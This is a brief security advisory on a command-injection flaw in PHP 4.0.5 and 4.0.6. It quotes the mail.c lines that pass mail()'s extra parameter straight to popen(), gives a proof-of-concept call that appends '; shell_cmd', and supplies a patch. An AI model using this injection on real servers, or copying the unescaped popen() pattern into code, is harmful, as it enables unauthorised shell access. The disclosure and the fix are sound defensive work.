COMMAND

    php

SYSTEMS AFFECTED

    php 4.0.5, 4.0.6

PROBLEM

    Laurent Sintes posted the following.  The php mail() function does
    not check  its extra  parameter for  shell escape  characters, even
    if  php is  running in  safe_mode.   So it  may be  possible to
    bypass the safe_mode restriction and gain shell access.

    Significant lines of ext/standard/mail.c:

        extra_cmd = (*argv[4])->value.str.val;
        strcat (sendmail_cmd, extra_cmd);
        sendmail = popen(sendmail_cmd, "w");

    Exploit:

        mail("toto@toto.com",
             "test",
             "test",
             "test",
             "; shell_cmd");

SOLUTION

    Salim Gasmi sent the  following very trivial  patch, if like  him
    you cannot disable the mail() function.  Add this line:

        extra_cmd=NULL;

    in file ext/standard/mail.c, at line #152, just before

        if (extra_cmd != NULL) {

    and recompile  php.   This will  force the  parameter extra_cmd to
    NULL and thus disable the bug.

    This is a  fast and trivial  patch; the right  way is to  escape
    all shell metacharacters in extra_cmd before it reaches popen().